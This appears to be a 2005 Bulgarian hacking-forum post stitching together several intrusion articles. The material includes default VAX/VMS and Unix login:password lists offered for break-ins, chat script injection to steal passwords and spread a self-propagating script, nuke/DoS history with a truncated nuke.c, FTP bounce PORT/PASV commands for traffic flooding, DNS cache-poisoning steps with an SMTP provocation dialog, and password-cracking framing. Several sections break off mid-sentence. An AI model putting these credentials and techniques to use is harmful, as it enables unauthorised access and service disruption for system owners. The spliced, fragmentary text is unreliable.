Ясно като бял ден, че има хора, които щателно следят своята система и действият в нея, но има и такива, които просто са занемарили всичко това и най-вече защитата. По такъв начин може да се досетите за отсъствие на необходимите корекции при дефолтовото инсталиране на системата и съответно съществуването на акаунти по подразбиране, които след смяната на няколко администратора просто не се изменят. Може това да ви звучи странно, но повярвайте ми, аз често се натъквам на уязвимост от подобен род. Огромно количество системи те пускат чрез логин по подразбиране root:root. Това съвсем ме "утрепа"!в някои дори са направени /etc/issue и issue.net на някакво извращение от рода на "Достъпът е резрешен само за момчетата от BackstreetBoys или N`Sync". Ако искате вярвайте, ако искате - , но към такъв "умник" аз някак си се tel'нетнах), а пропускат по guest:guest и същия този root. По-надолу съм предоставил някои обичайни идентификационни имена и пароли (принципът е Login:Password). Започвам с VAX/VMS:
SYSTEM:OPERATOR, SYSTEM:MANAGER, SYSTEM:SYSTEM, SYSTEM:SYSLIB, OPERATOR:OPERATOR, SYSTEST:UETP, SYSTEST:SYSTEST, SYSTEST:TEST, SYSMAINT:SYSMAINT, SYSMAINT:SERVICE, SYSMAINT:DIGITAL, FIELD:FIELD, FIELD:SERVICE, GUEST:GUEST
А също и най-елементарните акаунти (принципът е същия):
root:root, root:system, sys:sys, sys:system, daemon:daemon, uucp:uucp, tty:tty, test:test, unix:unix, unix:test, bin:bin, adm:adm, adm:admin, admin:adm, admin:admin, sysman:sysman, sysman:sys, sysman:system, sysadmin:sysadmin, sysadmin:sys, sysadmin:system, sysadmin:admin, sysadmin:adm, who:who, learn:learn, uuhost:uuhost, guest:guest, host:host, nuucp:nuucp, rje:rje, games:games, games:player, sysop:sysop, root:sysop, demo:demo
Виждаш как висчко е променливо в Unix? Тези акаунти ще ти помогнат още дълго. И както се казва: "If you wanna feel OK-> hack my UNIX everyday!". Статията не е инструкции за експлоатация, а служи за нагледен пример като демонстрация на администраторите за несъстоятелността на защитата на Unix системата
Взлом на HTML чат
Основата на интерфейса практически на всеки чат е съставен от динамически генерирани HTML-форми свързани помежду си посредством javascript. Във всички чатове името на ползватели и паролата (или някакъв идентификатор, който се генерира при входа от ползвателя) се съхраняват вътре във формата в качеството на скрит (hidden) елемент и могат да се изтеглят от там посредством скрипт. Да заставиш някой от посетителите на чата да изпълни своя javascript може само по пътя на получаване на пълен контрол над него - да кажете фраза от негово име или да издадете неговата парола.
За човек, знаещ основите на HTML и Javascript не е трудно да проникне в структурата на чат интерфейса, но виж да промъкнеш в тази структура троянски скрипт - ето това вече е проблем.
В най-простия случай, когато набираният от вас текст се показва в прозореца на чата "както си е" - без какъвто и да е контрол, вие просто въвеждате текста на вашия скрипт. Ако възникне проблем с ограничение дължината на реда, разделете скрипта на няколко кратки функции.
Но в повечето чатове все пак има проверка, която не позволява да се въвеждат "опасни" тагове в това число и
Този безобиден скрипт дава alert (сигнал) към посетителя, след което помества признание в любов към ЗАРАЗА от името на посетителя в общия прозорец на чата. Това стимулира останалите посетители да разгледат личната информация на ЗАРАЗА. Скриптът може да се усъвършенства, например да се изпраща в личната парола на посетителя, която се съхранява във вид на скрит елемент във всеки фрейм. Освен това може да се напише нещо от типа на вирус, който например да изменя името на ползвателя със ЗАРАЗА и да му поставя съответна парола. По такъв начин може да се зарази всеки участник от чата. За да се измени скрипта по такъв начин, че да се изпраща в личната парола на посетителя и да го превръща в ЗАРАЗА (при това всичките му съобщения ще излизат от името на ЗАРАЗА, но съобщенията за нея няма да може да вижда), трябва само да се допълнят пет реда на javascript (три на първото действие и два на второто).
Подобни дупки има в много чатове, където на посетителя му позволяват да избира цвят или размер на текста. Като правило въвежданото значение за цвета не се проверява. Направо или по пътя на модификация на страницата, като я съхраните на диска (в това число дори и ако цвета предлага да не се въвежда, а да се избере от приложените), може например, в качеството на цвят вместо любимия 'black' да се зададе '>
Механизмът за контрол на пропускванията се поддържа от Cisco рутери. Съществува не лоша реализация на такова обезпечение за FreeBSD и Linux. Следва да отбележим, че за протокола TCP средствата на рутера Cisco се оказват недостатъчни, тъй като за ефективна защита рутерът трябва за изследва състоянието на всяка преминаваща през него връзка, което е недопустимо за магистрален маршрутизатор.
Един от способите за борба с фиртрация на вътрешния трафик (из вътрешната мрежа в Интернет), в който се използват подменени IP адреси (адреси, които не се отнасят към вътрешната мрежа). Такъв способ се използва доста често, тъй като в пове
Ето случаи за атака се използва само първоначален SYN пакет, а обратният трафик (който не достиге до хоста на изпрощача) не играе рола.
Още един механизъм за повишение "животоспособността" на провайдора се явява използването на последните различни магистрални канали (multihome), които позволяват автоматически в случай, че един от каналите излезне от строя да се превключи на друг. Ефективна борба с такъв тип DoS атаки може да има само при щателен контрол на използването на всички основни мрежови ресурси. След печално известния взлом на сървъра на Yahoo и CNN FBI поело под свое наблюдение голямо количество мрежи с САЩ (особено в edu домейн).
Разбира се ползвателите не са в състояние да повлияят на пропусквателната способност на каналите на провойдора. При извършване на такава атака над даден ползвател голяма роля ще изиграе доброто взаимоотношение с провайдора, който може бързо да установи съответстващите филтри и да включи статистически запис (от гледна точка на икономия на дисково пространство такава статистика се записва само при необходимост).
Защита от атаки използващи грешки в стека TCP/IP, като правило, се състои в своевременното получаване на информация за уязвимите места и в установяване на пачове (или корекция на конфигурацията). В почощ може да е установяването ва междумрежов екран, който е в състояние да забрани достъпа до мрежата на много такива опасни пакети.
Защита от атаки, основани на препълване на ресурсите на системата или приложенията се състои в правилния избор на ресурсите на системата. За съжаление голяма част от обслужването на сървърните компоненти и операционната система не обезпечават контрола на количествата връзки в един адрес. От това може да се възползва атакуващия, създавайки няколко хиляди връзки със сървъра (законни от гледна точка на политиката на достъп). Като правило такава атака довежда до пълна блокировка на обслужването, а в някои случаи и на работата на съръвъра. Ако в тази атака са замесени няколко машини (източници на връзки), то последствията ще бъдат преди всичко печални. В тази ситуация единствената надежда на грамотния администратор, предвиждащ достатъчно запас на производителността на апаратната част, ресурсите и ядрото, е в скоростта на обработка на запитванията на връзките и поведението на приложенията. Ако скоростта на работа е голама, ядрото съдържа достатъчно отделено място, а приложенията отблъскват връзките, превишаващи максималния лимит, то сървърът е в състояние да устои на такава атака.
За да се бориш с DoS атаки е необходимо да умееш да ги откриваш. Това далеч не е тривиална задача - много сервизи протоколират само осъществяването на връзката. Например, при използването на популярния Web-сървър APACHE може нищо и да не се открие на пръв поглед, тъй като там се изобразяват само получените запитвания. Така докато сървърът не получи от клиента нещо от рода на GET/ в логовете нищо не се вижда, докато в същото време връзката ще просъществува достатъчно дълго, заемайки своя ред в ограничената по обем системна таблица.
Отделно трябва да се каже за системите откриващи атаките (IDS - Intrusion Detection Systems). В днешно време съществуват достатъчно много комерчески системи, които позволяват да се откриват такива атаки по целия ред принципи. Понякога IDS се интегрира с междумрежови екрани и рутери. Опасността от такава "интеграция" е трудно да се прецени - тя дава възможност на злоумишленика да застави междумрежовия екран да филтрира трафика от "честната" мрежа. За съжаление да се протестира срещу ефективността на IDS (в болшинството не много евтини) не му е времето сега. Но очевидно е, че възможността за събиране и анализ на подозрителния мрежов трафик сножава времето за реакция на службите по безопасност и позволява с минимално закъснение да се предприемат съответните мерки.
Правейки равностметка на по-горе казаното би могло да се каже, че не трябва напълно да си защитен срещу атаки "отказ в обслужването". Но може да се намали вероятността на успешните атаки или времето, необходимо за възстановяване на нормалната работа и достъпа до системата.
За това могат да бъдат полезни няколко препоръки:
Привличане на сериозни технически специалисти в областта на информационната обезпеченост за по-сложната работа (избор на система за защита, нейната настройка, информационно обслужване, анализ на статистика на взлома (ако има такъв)).
По възможност използване на по-широки канали за връзка с провайдора.
Използване на "сериозен" провайдор с добри канали (желателно е няколко), грамотно и бързо отговарящи на запитванията в помощ на администратора.
Използване на надеждна и ефективна операционна система от страна на сървъра, не се паддавайте на графичния интерфейс, а на провереното.
Използване на квалифициран системен администратор, работещ за безопасността.
Наличие на междумрежов екран с достатъчна производителност и добри технически характеристики.
NUKE
С nuke днес се обобщаватпочти всички атаки към портовете на отдалечени компютри, ковеждащи до забиване на системата или разпадане на връзката с интернет. Nuke'ът ненарушава състоянието на файловата система и няма да повреди "желязото" ви
След рестартиране на системата си вие можете отново да влезете в нет и да продължите работата си в системата.
Всичко започнало с изходният код, който бил написан на С и се наричал nuke.c. Атаката неполучила широко разпространение, тъй като можела да работи само на UNIX системи с root права, използвайки RAW_SOCET. Идеята на nuke.c се състояла в това, че тя изпращала невалидни (invalid) ICMP пакети и машината-хост загубвала връзката. През януари 1997 г. се появила атака под името Ping o"Death, и 18 от най-използваните операционни системи се оказали доста чувствителни към нея. Може би първата по-известна атака станала Out Of Band (WinNuke). На 7. 06. 1997 г., някакъв по име "_eci" за пръв път пюбликувал в нета изходният код. В течение на 15 дни, специалистите на Microsoft отстранявали дирите оставени из нета на епидемията на сините екрани. Тази епидемия не е угаснала и до днес. Атаката Out Of Band (OOB) основана натова, че порт 139 за Win (135 порт WinNT) не е затворен и изпращайки към него пакет данни с флаг на заглавката ООВ, може да се провокира забиване на системата и поява на син екран Още небили утихнали радговорите за ООВ и се появила нова напаст с името Ssping (Jolt). При тази атака на адреса на хоста се изпращат подправени TCP/IP пакети, които довеждат до забавяне на работата и разпадане на връзката. Тази атака не била толкова летална като ООВ, но също можела да доведе до много неприятности. В началото на юли 1997 г. на арената се появила Fragmentation Attack (Teardrop), тя се основавала на изпращането на IP пакети с неправилна дължина, които атакуваният компютър неможел да съедини и забивал. В началото на декември същата година се появила атака под името Land.Методите и били сходни с методите на SSPing с едно малко изключение - програмите справящи се с SSPing били безсилни. През януари следващата година се появили Bonk и Bonik - модификации на TearDrop, основаващи се на несформирана UDP информация на заглавките на IP пакети. След зачестилите атаки от такав род Microsoft пуска упдейти, които да помогнат на user'ите. За жалост по-голямата част от тях така и не се възползвали
Разплатата за небрежността станала през ноща на 2 към 3 март 1998 г., когато неизвестен злоумишленик извел от строя хиляди WINDOWS-машини в САЩ именно с такава атака. Сред пострадалите били NASA и Масачузетският технологичен университет. Често атаките се комбинират. Например, Land & IP Spoofing, нападащата страна многократно провокира с лъжливи съобщения, но в качеството на обратен адрес указва измислен. Потакъв начин възниква полуоткрито съединение (half-open connections). При определено количество на такива съединения сървърът не е в състояние да открива повече. В болшинството случаи сървърът-жертва забележимо забазя работата си
NUKE.C
Трябва да бъде с root права, за да отвори raw sockets.Тази версия ще "убие" почти всяка IP връзка. ВНИМАНИЕ: Софтуерът е доста опасен и притежанието му не е препоръчително! Опасно е от гледна точка на изкушението да направите истинска атака с него. Просто прочетете и се поучете, това е всичко!!! #include
SPAM
"СПАМ - трафик" или тънкостите на работа на протокола FTP.
За никой не е тайта, че в днешно време Интернет се развива особено бурно. Много малки фирми и организации вече не само поместват в мрежата свои страници, но и правят свои internet-сървъри. Като следствие от това се появиха значително количество хора, които не се явяват професионелни администратори. Месля си, че тази статия ще е полезна именно на такива хора - начинаещи администратори на internet-сървърии ще се докосне до организацията на такава безобидна услуга като FTP.
Всички ползватели на Internet навярно някога в своя живот са се сблъсквали с понятие като СПАМ. В моята "волна трактовка" СПАМ може да се опраделе като генериране на никому ненужен mail трафик. Трафикът може да бъде не само mail. За "неmail'ов СПАМ" може да се използва добрата стара услуга - FTP.
Общоизвестно е, че протокола FTP осигурява предаването на двоични и текстови файлове от и на FTP-сървъри. FTP-сървър може да бъде както компютър с Unix (Linux), така и компютър под Windows NT, на който работи FTP-сървър. Искам от сега да кажа, че тук няма да става дума за взлом на FTP-сървъри и всичко по-долу казано е в следствие на работа на малко документираните възможностти на протокола FTP. В болшинството компютърна литература не е указано, че FTP осигурява също възмжгността за предаване на файлове не пряко между сървъри.
Разбирам, че в този момент много "опитни" user'и ще ми се изсмеят за това, че дадения факт е общоизвестен, за това както казах по-горе тази статия е написана специално за начинаещи.
Ще се докоснем именно до тях. Многократно сме споменавали, че давайки на анонмни ползватели на сървъра правото за запис ние правим своя сървър потенциално уязвим. В такава ситуация е напълно възможно някакъв шегаджия от мрежата да генерира значителен трафик от някакъв достатъчно мощен сървър към вашия злочест FTP-сървър. За жалост е напълно възможно (ако разбира се вие не сте ограничили трафика си Естествено това не смъртоносно, но е твърде неприятно, ще ни се наложе да плащаме на някого за ненужния "СПАМ", ще ни се неложи да плащаме и то прилично - ето това е обратната страна на скопостния достъп в Internet
За това,че да разберем как става всичко това на практика е необходимо от близо да разгледаме работат на FTP протокола.
И така теория:
Когато клиент FTP се свързва с FTP-сървър се създава така таречената управляема връзка. Всъщност тя е обичаен сеанс telnet в режим NVT. Клиентът отправя команда към сървъра чрез управляемата връзка, а сървърът връща отговора по същата.
Когато ползватерят забрани препращането на файла се открива оделна връзка з предаването на данни и по нея се изпраща файла. Обикновено сървърът използва порт 21 за управляемата връзка и порт 20 за връзката за препращане на данни.
При открити връзки за препращане на файлове клиента изпраща команда PORT, която идентифицира неговия IP-адрес (4 байта) и новия порт (2 байта), за да се използват тези значения при препращането на данни. Байтовете се преобразуват в десетичен формат и се разделят със зъпетаи. Например IP-адрес 128.36.4.22 ще бъде записан като 128,36,4,22, а порт 2613 - като 10,53.
-->PORT 128,36,4,22,10,53
200 PORT command successful
Сървърът открива връзка по указания адрес socket.
Сценарият за връзката е такъв:
1. Локалният клиент получава новия порт и използва управляващата връзка за да съобщи на съвръра FTP номера на своя порт.
2. FTP-сървърът се смързва с новия порт на клиента.
3. Данните се предават.
4. Съединението се закрива.
Може да се използва и друг сценарий. Ако клиентът изпраща PASV, сървърът връща номера на порта и преминава към прослушване на установените връзки за данни от клиента. По-рано по-често се използваше команда PORT. Сега клиентът може да изпраща команда PASV за препращане на файлове през проста система на защита (firewall).
От казаното по-горе става ясно, че ако се създаде връзка с един сървър в пасивен режим, а с друг сървър в активен при това предавайки към тория сървър при открито съединени за препращане на данни вместо IP-адреса и порта FTP-клиента връща на първия сървър IP-адреса и порта за инициализирана връзка с клиента, образува се пряка връзка за предаване на данни между FTP-сървърите.
Първи FTP-сървър:
-->PASV
227 Entering Passive (x,x,x,x,7,254)
Втори FTP-сървър:
--> PORT x,x,x,x,7,254
200 PORT Command successful
FTP-протоколът започва своята работа по генериране на "съвършено ненужният" за получателя трафик и може да се каже, че всичко отива към СПАМ
Необходимо е да добавим, че за работата на по-горе казаното FTP-сървърите трябва да могат да работят в пасимен режим, а също да не проверяват съответствието на IP-адреса на FTP-клиента, иницииращ връзка с IP-адреса, фактически предаваем в командния ред. Ако първото условие се изпълнява практически повсеместно
Атака на DNS
Явявайки се един от основните елементи на инфраструктурата на IP-мрежата службата DNS, в същото време е далеч не толкова идеална от гледна точка на информационната безопасност. Ползването на транспортния протокол без установяването на виртуалният канал (UDP), отсъствието на средства за идентификация, оторизация и разграничения на достъпа, я правят уязвима за различни типове отдалечени атаки. В статията ще разгледаме междусегментната отдалечена атака на DNS-сървър, която не изисква твърде сериозни условия за провеждането и, а същевременно е ефективна и с практическа реализация.
• DNS с думи прости е разпределена база данни, основното съдържание на която се явява информацията за съответните символни имена на мрежовите обекти, техните IP-адреси. DNS е опганизирана по йерархически принцип. Структурната единица на тази база е домейна (domain), който на свои ред може да съдъпжа други домейни (поддомейни). Първичният источник на информация за всеки домейн е отговарящият за даденият домейн DNS-сървър (могат да бъдат няколко). Отговорността за част от информацията на домейна (поддомейна) може да бъде делегирана на други сървъри. Клиентската част DNS се нарича resolver, достъпът до който приложните програми получаст чрез API. При взаичодействие на resolver'a със сървъра в качество на транспортен протокол се използва UDP. Запитванията генерирани от resolver'а се явяват рекурсивни, т.е. в качеството на отговор на такова запитване се връща или исканата информация или съобщение за нейното отсъствие. Получавайки запитване от resolver'а, съвръра или веднега връща отговора (при условие, че исканата информация е в базата), или формира запитване към друг сървър. Това запитване обикновено се явява интерактивно и за разлика от рекурсивното допуска отговор във вид на препратка към друг сървър, който е по-добре осведомен за мястото на разположение на исканата информация. Като общо търксенето започва от кореновия сървър, който възвръща информацията за сървърите отговарящи за домейна на най-горно ниво, след което се формира ново интерактивно запитване към един от тези сървъри и т.н. Резултата от тази верига въпрос/отговор се явява или получаването на исканата информация или информация за нейното отсъствие, след което отговорът се връща на resolver'а. всички запитвания към сървъра в процеса на работа се кешират с цел ускорение обслужването на последните запитвания и минимизация на мрежовия трафик.
• Междусегментна отдалечена атака на DNS-сървър
Възможността за атака на DNS по пъта на фалшификация на отговора на DNS-сървъра е известна доста отдавна. Обектът на атака може да е както resolver'а, така и DNS-сървъра. Причината за успеха на подобни атаки се крият в лекотата на фалшификация на отговорите на сървъра. Протоколите DNS, използвани в днешно време не включват кой знае какви средства за проверки на оторизацията на получаваните данни и техния източник, напълно осланяйки се в това на по-ниско лежащите протоколи на транспортно ниво. Използваният транспортен протокол (UDP), с цел повишаване ефективността не предполага установяване на виртуален канал и използва в качества на идентификатор източника на съобщения IP-адреса, който може да бъде елементарно подправен. При възможност атакващия да прехване съобщения, които лъжат клиента и сървъра (вътрешно сегментна атака) реализацията на такава атака не представлява почти никаква трудност. Въпреки всичко такъв вариант на атака не представлява значителен практически интерес, до колкото възможността за вътрешно сегментна атака предполага наличието на определен взаимно свързан клиент със сървъра и хоста (например, атакуващият и целеви DNS-сървър ги разделя физическата среда на предаване), което на практика се реализира доста рядко. По-чести са случаите на междусегментни атаки, които не изискват такива усливия. По тази причина ние ще се спрем именно на такъв клас отдалечени атаки представляващи както академичен, така и практически интерес.
Междусегментната атака на DNS-сървъра изглежда по следния начин. Да предположим, че цел на атаката ни се явява поддомейн с IP-адрес на web-сървъра www.coolsite.com с IP-адрес на сървъра www.badsite.com за user'ите на някаква мрежа, която обслужва DNS-сървъра ns.victim.com. Във фазата на атака ns.victim.com се провокира за търсенето на информация за IP-адрес www.coolsite.com по пътя на рекурсимно запитване. Във втората фаза атакуващия изпраща на сървъра ns.victim.com лъжлив отговор от името на ns.coolsite.com, който се явява отговорен за домейн coolsite.com. в лъжливия отговор вместо реалния IP-адрес на www.coolsite.com се указва IP-адреса на www.badsite.com. Сървърът ns.victim.com кешира получената информация в резултат на което в течение на определен промеждутък от време (големината на промеждутъка се указва в полето TTL на лъжливия отговор и може да се избира произволно от атакуващия) нищо неподозиращите user'и вместо на сървъра www.coolsite.com попадат на www.badsite.com. за да може лъжливият отговор да бъде възприет от сървъра ns.victim.com като истински е достатъчно да бъдат изпълнени четири условия: IP-адреса на отправителя на отговора е длъжен да съответства на IP-адреса на запитващия сървър (в нашия случай ns.coolsite.com); UDP-портът към който се отправя оговора трябва да съвпада с порта, от който е било изпратено запитването; идентификаторът трябва да съвпада с идентификаторът на запитването; отговорът трябва да съдържа запитваната информация (в нашия случай IP-адреса на web-сървъра www.coolsite.com). Очевидно е, че изпълнението на първото и четвъртото условие за атакуващия няма да е трудно. Второто и третото условие на ситуацията са малко по-сложни, до колкото в случая на междусегментна атака, атакуващия няма възможност да прехване изходното запитване и да "прегледа" необходимите параметри. Болшинството използвани в двешно врими за реализация DNS-сървъри (BIND4, MS DNS) използват за изходни запитвания порт 53, така че може успешно да се изпрати лъжлив отговор към този порт. Дадения метод обаче не винаги сработва, например BIND8 може да използва за изходни запитвания случайно избран непривилигирован порт. Идентификаторът (id) на запитването представлява двубайтово число, указващо сървъра в запитването с цел еднозначна идентификация на отговора на даденото запитване. Това число се инкрементира с всяко ново запитване. Незнанието на некущото значение на идентификаторът довежда до необходимост от изпращане на множество лъжливи отговори с различни значения id. Именно това обстоятелство прави практическата реализация на дадената атака трудно осъществима. Действително лъжливия отговор трябва да бъде получен от целевия сървър в промеждутък от време от момента на изпращането на запитването до момента на пристигането на отговора от истинския сървър, което на практика представлява не повече от няколко секунди. За този интервал от време атакуващия трябва да изпрати 216 лъжливи отговора с всички възможни значения id, а в случаите на незнание на портовете тази цифра се увеличава с още няколко десетки пъти. До колкото размера на IP-пакета, съдържащ лъжливия отговор е около 100 байта, то пред атакуващия стои задачата за изпращането на няколко мегабайта информация за няколко секунди, което в болшинството случаи е неосъществимо
• Метод за определяне номера на порта и текуция идентификатор на запитването
При изпълнение на допълнителните условия даже в случаите на междусегментна атака атакуващия има възможност да определи текущия id на запитването и номера на порта. Контролът над сървъра в дадения контекс означава възмогността да се прехванат всички запитвания адресирани до и от него. Това е възможно ако атакуващият непосредствено овладее сървъра (явява се негов администратор) или разделя с него общата физическа среда на предаване (в случай на ethernet). Очевидно, че даденото условие не е трудно изпълнимо до колкото намиращите се в един колизионен домейн с DNS-сървъра е типично за корпоративните мрежи. При наличие на контролирания сървър описаната ак.така може да бъде модифицирана по следния начин. Да предположим, че атакуващия контролира сървъра ns.hacker.com, отговарящ за домейна hacker.com. в първата фаза на атаката ние провокираме сървъра ns.victim.com за обръщение към ns.hacker.com по пъта на изпращането на рекурсивно запитване за търсене на каквото и да е име (не е задължително да е съществуващо) в домейна hacker.com. До колкото ns.hacker.com се намира под контрола на атакуващия той може да прехване това запитване и да извлече от него информация за номера на порта и текущия id. Следващите две фази на атаката не се различават от описаните с тази разлика, че атакуващия е достатъчно да изпрати само няколко ръжливи отговора тъй като той точно знае номера на порта и може с висока степен на точност да предскаже значението на идентификатора на запитването към ns.coolsite.com.
• Метод на косвена провокация
Очевидно е, че необходими условия за успешното провеждане на атаки се явява възможността за изпращане на рекурсивни запитвания към целевия сървър, провокиращи го към обръщение към други сървъри с цел търсене на исканата информация. По принцип съществува възможност DNS-сървърът да се настрои по такъв начин, че да приема рекурсивни само от "свои" клиенти (хостове, ресолвери). В този случай осъществяването на атаката е невъзможно. С цел да се заобиколи това ограничение може да се предложи прост метод, който условно ще наречем "косвена провокация". Основната идея на този метод се заключава в използването на която и да е общодостъпна услуга, явяваща се клиент на целевия DNS-сървър, за формиране на необходимото провокиращо запитване. Най-подходящ кандидат представлява общодостъптия сървър за електронна поща, който по определение е длъжен да приема връзки с всички компютри от Интернет. Да предположим, че ресолвера на компютъра mail.victim.com е настроен за използване на сървъра ns.victim.com, като последния приема рекурсивните запитвания само от домейна ns.victim.com. примерът по-долу за SMTP-диалог провокира ns.victim.com за търсене на информация за име any-name.any-domain.com: $ telnet mail.victim.com 25 Trying... Connected to mail.victim.com. Escape character is '^]'. 220 mail.victim.com ESMTP Sendmail 8.8.0/8.8.0; Wed, 5 May 2001 21:30:42 helo I.am.cracker 250 mail.victim.com Hello crack.hacker.com [1.1.1.1], pleased to meet you mail from: user@any-name.any-domain.com 250 user@any-name.any-domain.com... Sender ok quit 221 mail.victim.com closing connection Connection closed. По такъв начин използвания метод на "косвена провокация", позволява осъществяването на атака без пряко изпращане на запитване към целевия DNS-сървър.
• Как възниква епидемия
При нормални условия успешната атака довежда до "заразяването" на кеша на конкретния сървър и областта на разпространение на лъжливата информация се ограничава само до неговите клиенти. При наличие на ситуация на "неконкретно делигиране" (lame delegation), възникваща заради грешки при администрирането е възможно разпространение на лъжлива информация на други сървъри, което може да доведе до глобално заразяване. Под некоректно делигиране се резбира ситуация при която ответствеността за домейна се делегира на сървър, който не притежава локално копие с информацията за домейна. Това довежда до това, че в отговор на интерактивните запитвания на другите сървъри вместо исканата от тях информация, той им връща техните запитвания. Да разгледаме ситуация при която за домейна victim.com съществува два отговарящи сървъра - ns.victim.com и ns2.victim.com, но за ns2.victim.com делегирането не е извършено коректно. Използвайки описания метод отокуващия може да "зарази" кеша на сървъра ns2.victim.com с лъжлива информация за имената в домейна victim.com, например, да подмени IP-адреса на web-сървъра www.victim.com с IP-адреса www.very-bad-site.com. До колкото ns2.victim.com се счита за отговорен за домейн на victim.com другите сървъри в Интернет ще се обръщат към него за информация и имена в този домейн. Не разполагайки с локални копия на информацията за домейна за victim.com, даденият сървър ще връща в отговор по-рано кешираната лъжлива информация, довеждайки до "заразяване" на всички обръщащи се към него сървъри. Неприятна особеност на дадения сценарий е невъзможността за бърза ликвидация на последствията от атаката, до колкото лъжливата информация се намира в кеша на хиледи сървъри до изтичане на определеното време, което атакауващия може да избере да е доста голямо
• Реализация и полеви изпитания
Програмата за реализация на атака на DNS-сървър с използване на контролирания сървър, стана достъпна в Интернет вероятно от февруари 1999г. За щастие използването на такива програми не ви извеждат директно IP-адреса на целевия сървър и няма директен клавиш "Infect It!", а изисква достатъчно задълбочени познаня за принципите на работа на DNS. С цел да се обезпечи чистотата на експеримента (полевите изпитания) са били взети три неконтролирани от атакуващия корпоративни мрежи. Естествено администраторите им са били наясно и не са се възпрогивили против експеримента. За съжаление нито една от тях не е устояла на атаката. Диапазона на целите, които могат да бъдат достигнати с помощта на DNS-атака се простират от "отказ за обслужване" и подмяна на web-сайтове до прехващане на съобщенията на илектронната поща и пълен контрол над информацията предавана между произволно избрани хостове в net'а. При всичко това атакуващия практически не оставал следи, до колкото на него не му било необходима да изпраща провокиращи запитвания и лъжливи отговори от собствения си IP-адрес.
• Поглед от другата страна на барикадата
По мнението на автора в днешно време единствените надеждни средства за противодействие срещу описаната атака се явяват използваните стандартизирани в RFC2065 разширения на протокола DNS, разгреждащи използването на криптографски метод за идентификация на информацията за домейна и с обектите за мрежови взаимодействия. Базовата подддръжка на този стандарт е включена във версията BIND8. За съжаление желан резуртат може да се постигне само при широкомащабното внедряване на новите протоколи, което е съпроводено със зночителни организационни трудности и не би могло да стане в близко време. За да затрудните все пак осъществяването на атака може да забраните обслужването на DNS-сървъра към рекурсивни запитвания, постъпващи от "чужди" клиенти. Това може да бъде направено както чрез средствата на собствения сървър (например, BIND8 има такива възможности), така и със средства за междумрежово екраниране. Трябва да обърнете внимание на настройката за "антиспуфинг" на firewall'а си. При използване на дадения метод не трябва да се забравя, че подобна защита може да бъде достатъчно лесно преодоляна чрез използването на описания метод за косвена провокация.
Заключение
Тази атака се различава от останалите, които търсят "следи", backdoors и различни грешки на администраторите, и използването на "социалната инженерия" по своята изящност. В същото време по своя характер и мащабност на резултатите дадената атака напълно може да бъде наречена информационно оръжие за масово поръжение!!! )) Липсата на адекватни средства на защита много слабо изразените "дири" и трудностите при отстраняване на последствията от атаката още повече влошават ситуацията. Удивителен е фактът, че не се използва широко от взломаджии. Може би това се обяснява с недостатъчната им квалификация
На мрежоните администратори им остава само да се надяват, че уязвимостите на DNS-протокола ще бъдат отстранени преди те самите да я почуства върху гърба си
freaker
Oct 4 2005, 04:32 PM
Ето още малко"
QUOTE
Пароли и Контрол на Достъп
За защита на компютрите в днешно време се вземат пред вид три основни класа за контрол на достъпа:
• контрол, основан на знанието на парола;
• контрол, основан на притежанието на ключ;
• контрол, основан на лични характеристики (т.нар. биометрика - пръстови отпечатъци, ретина и др.)
В случаите на контрол, основан на говор спада към предметите, принадлежащи на ползвателя - физически ключ, магнитна карта и др. Понякога се ползва метална пластинка с причудлива форма, която се поставя преди началото на работа в шел разпознавател. За "ключ" може да послужи идентификационен знак или специално писмо с подписа на някои високопоставено лице от компанията.
Биометричните прибори анализират специфични физически особености на ползвателя (подпис, пръстови отпечатъци или линиите на дланите) и ги анализират с тези, които се намират в паметта. Тези видове компютърна защита могат да се използват и за дистанционно управление на достъпа, макар че обикновено към тях се прибягва за ограничаване на достъпа към местата където се намират компютрите - компютърна зала или отделен кабинет.
Биометрическите и физическите ключове ще разгледаме подробно по-късно.
Първият вид контрол на достъп - най разпространеният - е основан на притежание на специфична информация. Това означава, че правата на достъп се притежават не от тези лица, които са способни да демонстрират своите знания за определен вид секрет, обикновено парола. Работата на хакера се състои именно в търсенето на тази парола. В статията ще се спра на всичко, което трябва да знаете за паролите: как работят, къде се съхраняват и как може да се "взломят".
Пароли
Най-лесният начин да се защити всеки тип компютърна система се свежда до стария изпитан метод: поставянето на парола. Даже тези компютри, които въобще не се нуждаят в средствата за защита често се снабдяват с пароли, просто защото тя дава чувство за психологически комфорт и използването й не изисква много време и място от паметта. Освен това в системите вече защитени с други средства - магнитни карти или други програмни методи или видове шифроване, често за удвояване или утрояване на защита прибягват до паролите. По такъв начин практически всички компютри включват в себе си пароли от един или друг вид паролите като правило се разглеждат в качеството си на ключове за вход в системата, но те се използват и за други цели: блокиране на записа на дисковото устройство, в команди за шифроване на данни или на разшифроване на файлове - накратко във всичките случаи когато се изисква твърда увереност за това, че съответните действия ще се извършат само от законния собственик или ползвател на програмното обезпечение.
Паролите се разделят на седем основни групи:
• пароли, създадени от ползвателя;
• пароли, генерирани от системата;
• случайни кодове на достъп, генерирани от системата;
• полудуми;
• ключови фрази;
• интерактивна последователност от типа "въпрос - отговор";
• строги пароли.
Ако сте решили да вломявате преди всичко трябва да сте наясно кой от тези седем вида пароли се използва в дадената система.
Първият вид се явява най-разпространен - обикновено ползвателите за запазване на своята индивидуалност си измислят пароли.
Случайните пароли и кодовете, установени от системата, могат да бъдат няколко разновидности. Програмното обезпечение на системата може да приеме напълно случайна последователност от символи или в генериращата процедура могат да бъдат използвани ограничения. Например всеки код на достъп се съгласува с по-рано подготвен шаблон (от рода на abc-12345-efghn, където буквите и цифрите на зададените позиции се генерират по случаен начин). Създаваните пароли също могат по случаен начин да се извлекат от списък с обичайни или нищо не значещи думи, създадени от автори на програми, които образуват пароли от рода на onah.foopn или ocar-back-treen. Полудумите частично се създават от ползвателя, а частично се подразбира някакъв случаен процес. Това означава, че дори ползвателя да измисли лесна за разпознаване парола, например "тайна", компютърът ще я допълни с някаква безсмислица, като образува по-сложна парола от типа на "тайна, 5rh11".
Ключовите фрази са добри с това, че са дълги и трудно се разгадават, но пък за сметка на това са лесни за запомняне. Фразите могат да бъдат смислени от типа "we were troubled by that" или без смисъл - "fished up our nose". Ключовите фрази се използват в такива огранизации, където менажерът е пораноик на тема защита. Трябва да се отбележи, че в програмирането постепенно се забелязва тенденция към преход към по-широко приемане на ключовите фрази.
